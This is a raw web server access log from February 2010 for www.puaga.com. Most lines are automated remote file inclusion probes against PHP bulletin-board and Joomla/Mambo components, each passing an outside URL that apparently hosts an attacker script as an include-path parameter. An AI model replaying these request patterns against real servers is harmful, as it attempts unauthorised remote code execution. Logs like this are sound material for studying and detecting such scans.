216.36.59.85 - - [08/Feb/2010:06:03:41 -0800] "GET /logs/access_100111.log//write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:03:45 -0800] "GET /logs/access.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:03:45 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:03:46 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:03:57 -0800] "GET /logs/access_100115.log//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:03:57 -0800] "GET /logs//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:03:57 -0800] "GET /popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:03:58 -0800] "GET /skin/happycast/view.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:03:58 -0800] "GET /logs//skin/happycast/view.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:03:58 -0800] "GET /logs/access_100117.log//skin/happycast/view.php?dir=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:04:03 -0800] "GET /logs/access_100109.log//write_comment_update.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:04:09 -0800] "GET /logs/access_100108.log//delete_all.php?board_skin_path=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:04:12 -0800] "GET /logs/access_100123.log%20%20//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:04:24 -0800] "GET /logs/access_100123.log//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:04:58 -0800] "GET /logs/access_100119.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:05:15 -0800] "GET /logs/access_100119.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:05:29 -0800] "GET /popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:05:29 -0800] "GET /logs/access_100115.log//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:05:29 -0800] "GET /logs//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:05:37 -0800] "GET /logs/access_100123.log//popup_window.php?site_isp_root=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:06:05:46 -0800] "GET /logs/access_100114.log%20%20/errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:06:05:46 -0800] "GET /errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:06:05:46 -0800] "GET /logs/errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:06:06:59 -0800] "GET /errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:06:06:59 -0800] "GET /logs/access_100114.log/errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [08/Feb/2010:06:06:59 -0800] "GET /logs/errors.php?error=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:07:10 -0800] "GET /include/prodler.class.php?sPath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:07:10 -0800] "GET /logs/access_100119.log%20%20//include/prodler.class.php?sPath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:07:10 -0800] "GET /logs//include/prodler.class.php?sPath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [08/Feb/2010:06:07:11 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [08/Feb/2010:06:07:12 -0800] "GET /logs/access.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [08/Feb/2010:06:07:12 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:07:56 -0800] "GET /logs/access_100117.log%20%20//include/prodler.class.php?sPath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:06:08:56 -0800] "GET /bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:06:08:57 -0800] "GET /logs//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:06:08:57 -0800] "GET /logs/access.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.241.52.111 - - [08/Feb/2010:06:09:14 -0800] "GET /logs/access_100119.log%20%20//bbs////write_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:09:37 -0800] "GET /logs/access_100103.log%20%20/become_editor.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:09:37 -0800] "GET /become_editor.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:09:37 -0800] "GET /logs/become_editor.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:09:37 -0800] "GET /logs/access_100117.log%20%20/become_editor.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:09:39 -0800] "GET /logs/access_100103.log%20%20/become_editor.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:09:39 -0800] "GET /logs/become_editor.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:09:39 -0800] "GET /become_editor.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.73.144.196 - - [08/Feb/2010:06:09:45 -0800] "GET /logs/access_100117.log%20%20/become_editor.php?theme_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.106.160 - - [08/Feb/2010:06:09:52 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:10:32 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:10:36 -0800] "GET /logs/access_100123.log//include/prodler.class.php?sPath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:11:07 -0800] "GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:11:11 -0800] "GET /logs//admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:11:11 -0800] "GET /logs/access_100125.log%20%20//admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:06:13:03 -0800] "GET /logs/access_100117.log/index.php?sayfa=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.103.128.44 - - [08/Feb/2010:06:13:17 -0800] "GET /logs/access_100129.log/index.php?sayfa=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:13:33 -0800] "GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:13:37 -0800] "GET /logs//admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [08/Feb/2010:06:13:37 -0800] "GET /logs/access_100125.log%20%20//admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:14:11 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:14:11 -0800] "GET /logs/access_100127.log//?_SERVER[DOCUMENT_ROOT]=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:14:12 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:14:19 -0800] "GET /logs/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:14:20 -0800] "GET /errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:14:20 -0800] "GET /logs/access_100126.log/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.36.59.85 - - [08/Feb/2010:06:14:21 -0800] "GET /logs/access_100130.log//?_SERVER[DOCUMENT_ROOT]=http://www.bokji.or.kr/id/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.88.4.141 - - [08/Feb/2010:06:14:45 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.88.4.141 - - [08/Feb/2010:06:14:45 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.88.4.141 - - [08/Feb/2010:06:14:45 -0800] "GET /logs/access_100108.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.88.4.141 - - [08/Feb/2010:06:14:57 -0800] "GET /logs/access_100105.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.clubedasmotocas.com.br/data/data/unit/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:15:27 -0800] "GET /logs/access_100113.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:15:33 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:15:36 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:06:16:04 -0800] "GET /logs/access_100124.log/errors.php?error=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.232.161.146 - - [08/Feb/2010:06:17:02 -0800] "GET /logs/access_100113.log///components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://luphuntara.darmajaya.ac.id/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.232.161.146 - - [08/Feb/2010:06:17:02 -0800] "GET //components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://luphuntara.darmajaya.ac.id/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
72.232.161.146 - - [08/Feb/2010:06:17:02 -0800] "GET /logs///components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://luphuntara.darmajaya.ac.id/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:17:17 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:17:17 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:17:17 -0800] "GET /logs/access_100113.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:06:17:32 -0800] "GET /logs/access_100103.log%20%20//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.90.47.134 - - [08/Feb/2010:06:17:33 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://allelon.org/log.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:06:19:18 -0800] "GET /logs/access_100112.log%20%20/e404.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:06:19:18 -0800] "GET /logs/e404.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:06:19:18 -0800] "GET /e404.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.202.84 - - [08/Feb/2010:06:19:22 -0800] "GET /logs/access_100103.log%20%20/e404.php?DOCUMENT_ROOT=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.232.161.146 - - [08/Feb/2010:06:21:14 -0800] "GET /logs/access_100123.log///components/com_phpshop/show_image_in_imgtag.php?mosConfig.absolute.path=http://luphuntara.darmajaya.ac.id/ID.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:21:42 -0800] "GET /skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:21:42 -0800] "GET /logs/access_100103.log//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:21:42 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:21:45 -0800] "GET /skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:21:45 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:21:45 -0800] "GET /logs/access_100103.log//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:06:22:07 -0800] "GET /logs//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:06:22:07 -0800] "GET /logs/access_100114.log%20%20//plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [08/Feb/2010:06:22:07 -0800] "GET /plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.clubedasmotocas.com.br/data/data/unit/ld1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [08/Feb/2010:06:22:15 -0800] "GET /logs/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [08/Feb/2010:06:22:15 -0800] "GET /logs/access_100202.log/bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [08/Feb/2010:06:22:15 -0800] "GET /bbs/delete_all.php?board_skin_path=http://www.parkwonbae.com/bbs/img/login_table_bg_left.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:18 -0800] "GET /skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:18 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:18 -0800] "GET /logs/access_100103.log//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:21 -0800] "GET /logs/access_100201.log//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:22 -0800] "GET /skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:22 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:22 -0800] "GET /logs/access_100103.log//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:23 -0800] "GET /logs/access_100201.log//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:24 -0800] "GET /logs/access_100201.log//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:33 -0800] "GET /logs/access_100201.log//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:37 -0800] "GET /skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:37 -0800] "GET /logs/access_100103.log%20%20//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:22:37 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:06:22:55 -0800] "GET /logs//delete.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:06:22:55 -0800] "GET /delete.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:06:22:55 -0800] "GET /logs/access_100114.log%20%20//delete.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:06:23:06 -0800] "GET /logs/access_100115.log///appserv/main.php?appserv_root=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:06:23:07 -0800] "GET //appserv/main.php?appserv_root=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:06:23:08 -0800] "GET /logs///appserv/main.php?appserv_root=? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:06:23:23 -0800] "GET /logs/access_100201.log%20%20//delete.php?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:06:23:38 -0800] "GET /logs/access_100127.log%20%20//bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:06:23:38 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:06:23:38 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.82.114.106 - - [08/Feb/2010:06:23:38 -0800] "GET /logs/access_100203.log%20%20//bbs//write_update.php?board_skin_path=http://www.barcamenando.it/open.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:23:42 -0800] "GET /logs/access_100201.log%20%20//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:23:51 -0800] "GET /skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:23:51 -0800] "GET /logs/access_100103.log%20%20//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.18.166 - - [08/Feb/2010:06:23:51 -0800] "GET /logs//skin/zero_vote/login.php?dir=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
